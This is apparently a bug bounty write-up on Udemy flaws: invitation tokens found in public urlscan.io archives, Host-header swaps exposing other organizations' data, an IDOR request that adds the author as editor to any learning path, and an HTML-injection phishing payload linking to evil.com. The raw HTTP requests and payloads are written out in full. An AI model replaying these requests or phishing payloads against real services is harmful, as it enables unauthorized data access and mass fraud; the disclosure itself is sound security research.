From URL dumps digging to IDOR , BAC, Massive Phishing in Udemy

Hey All,

It is my first writeup since i kicked off my cyber security career so lets start,

Recently i was trying some OSINT framework tools when i came across a website malware scanner which was urlscan.io this website scans the url for possibility of being a malware or a phishing website and all submitted scans are archived for public access and you can search for this scans by using the domain name or a keyword of the url. so i started to search randomly for a common websites like twitter ,uber,udemy… maybe i can find a private instances or a less accessible pages for public and i came to https://urlscan.io/search/#page.domain:udemy.com and some urls got my attention that was *.udemy.com/?data=token *.udemy.com/organization/accept-invitation/?email=token

Broken Access Control — Udemy

The bug was working as anyone would claim these invitations without any extra verification to make sure if the intended user was the real one who redeem it.

Invitation Redeem

They fixed it by requiring an extra verification

Information Disclosure-Udemy

Learning Paths feature let you as a business organization member either a user or a moderator to create a learning tracks and share it with others in the same organization only.

Every business organization have a handle or a account name which looks like handle.udemy.com which distinct it from other organizations.

Disclosing Organizations Learning Paths

GET /api-2.0/learning-paths/?page=1&page_size=20&fields[learning_path]=@default,is_user_enrolled,estimated_content_length,num_enrollments,folder_ids,is_owner_in_group&list_type=all&ordering=-created HTTP/1.1
Host: █████.udemy.com
HTTP/1.1 200 OK{“count”:30,”next”:”█████","previous":null,"results":[{"_class":"learning_path","id":█████504,"title":"Ethical Hacking”,”description”:”Path to becoming Ethical Hacker. Learning journey would include Web app hacking, N/W hacking, AD hacking, Privilege escalation and much more.”,”owner”:{“_class”:”user”,”id”:█████6538,”display_name”:”█████S”,”image_50x50":”*","initials":"SP"},"is_public":true,"editors":[{"_class":"user","id":█████6538,"display_name":"█████S”,”image_50x50":”█████","initials":"SP"}],"is_user_enrolled":false,"estimated_content_length":3172,"num_enrollments":2,"folder_ids":[],"is_owner_in_group":false},}

I changed account name in host header to another organizations account names and got all learning paths created on these organizations with their members data.

I tested the attack vector against other api endpoints which don’t require account id in the request according to their api documention

Disclosing Trial Organizations Status

GET /api-2.0/organization-trial/status/ HTTP/1.1
Host: █████.udemy.com
HTTP/1.1 200 OK{“available_count”: 5, “active_remaining_days”: 0, “owner_email”: “█████”, “trial_limit_reached”: false, “used_count”: 0, “owner_name”: “█████”, “is_owner”: false, “remaining_seats”: 0}

The same attack vector above ,i changed account name in host header to another organizations and i got organizations trial data.

Insecure Direct Object Reference-Udemy

PUT /api-2.0/learning-paths/█████886/permissions/ HTTP/1.1
Host: █████.udemy.com
{"added_editors_ids":[],"removed_editors_ids":[]}

I changed learning path id to a random one in the request and added my user id in added_editors_ids the final request looks like :

PUT /api-2.0/learning-paths/█████514/permissions/ HTTP/1.1
Host: █████.udemy.com
{“added_editors_ids”:[
152495920
],”removed_editors_ids”:[]}
HTTP/1.1 200 OK{"results":[{"_class":"user","id":█████034,"display_name":"█████vschi","image_50x50":"█████","initials":"AP"},{"_class":"user","id":152495920,"display_name":"Mostafa Mamdoh","image_50x50":"█████","initials":"MM"}]}

I was able to add myself as an editor in any learning path in the same or different organization also i could remove any editor from it by adding it’s id in removed_editors_ids values.

Possible Massive Phishing Attack Through Html Injection

POST /api-2.0/share/course/█████/recommend/ HTTP/1.1-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████388
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████382
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████580
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████083
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████288
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████988
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="message"
<h1>Hey █████</h1>Please go to https://evil.com/accept to redeem your invite <img src="https://pbs.twimg.com/profile_images/810954665202434052/_m3mPbHa_400x400.jpg" alt="Smiley face" width="42" height="42" style="vertical-align:bottom">
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="context"
ufb_clp
-----------------------------374017102511920071852193229569--

These feature allows you to recommend several users at the same time , i added many user ids to the request , a personal accounts (Non business ones) i created normally from https://www.udemy.com/join/signup-popup/ and i got that mail

Theoretically i was able to send a massive injected phished content to all their users[was nearly 150000000 users at time of reporting] personal or business ones by iterating over their all user Ids as the endpoint didn’t implement rate limiting at that time.

Reports time Line:

  • March 3,2021 — Vulnerabilities reported.
  • April 7,2021–Total Bounties Awarded 1300$
  • August 7,2021 — Reports Resolved

Tips:

  • Use public url archives or scanners to recon for a private instances or a leaked tokens belongs to sensitive features ,Use https://osintframework.com/
  • Try to elevate your content injections impact by chaining it with phishing scenarios